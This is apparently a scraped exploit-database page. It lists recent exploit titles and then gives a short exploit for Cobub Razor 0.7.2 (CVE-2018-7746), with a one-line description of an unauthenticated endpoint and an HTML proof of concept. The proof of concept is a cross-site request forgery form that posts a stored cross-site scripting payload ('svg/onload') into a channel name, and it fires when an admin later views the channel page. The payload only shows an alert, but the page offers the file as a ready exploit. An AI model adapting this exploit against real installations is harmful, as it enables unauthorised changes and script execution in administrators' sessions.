7788a305c5
6 changes to exploits/shellcodes 2345 Security Guard 3.7 - Denial of Service 2345 Security Guard 3.7 - '2345NetFirewall.sys' Denial of Service 2345 Security Guard 3.7 - '2345BdPcSafe.sys' Denial of Service Reaper 5.78 - Local Buffer Overflow EMC RecoverPoint 4.3 - 'Admin CLI' Command Injection Mantis 1.1.3 - manage_proj_page PHP Code Execution (Metasploit) Mantis 1.1.3 - 'manage_proj_page' PHP Code Execution (Metasploit) Open-AudIT Professional - 2.1.1 - Cross-Site Scripting Ncomputing vSpace Pro v10 and v11 - Directory Traversal PoC Ncomputing vSpace Pro 10/11 - Directory Traversal Fastweb FASTGate 0.00.47 - Cross-site Request Forgery Fastweb FASTGate 0.00.47 - Cross-Site Request Forgery Open-AudIT Community - 2.2.0 – Cross-Site Scripting
22 lines
No EOL
936 B
Text
22 lines
No EOL
936 B
Text
# Exploit Title: Cobub Razor 0.7.2 Cross Site Request Forgery
|
|
# Date: 2018-03-07
|
|
# Exploit Author: ppb
|
|
# Vendor Homepage: https://github.com/cobub/razor/
|
|
# Software Link: https://github.com/cobub/razor/
|
|
# Version: 0.72
|
|
# CVE : CVE-2018-7746
|
|
|
|
There is a vulnerability. Authentication is not required for /index.php?/manage/channel/modifychannel. For example, with a crafted channel name, stored XSS is triggered during a later /index.php?/manage/channel request by an admin.
|
|
|
|
|
|
<html>
|
|
<body>
|
|
<script>history.pushState('', '', '/')</script>
|
|
<form action="http://127.0.0.1/index.php?/manage/channel/modifychannel" method="POST">
|
|
<input type="hidden" name="channel_id" value="979" />
|
|
<input type="hidden" name="channel_name" value="xss><svg/onload=alert(1)>" />
|
|
<input type="hidden" name="platform" value="1" />
|
|
<input type="submit" value="Submit request" />
|
|
</form>
|
|
</body>
|
|
</html> |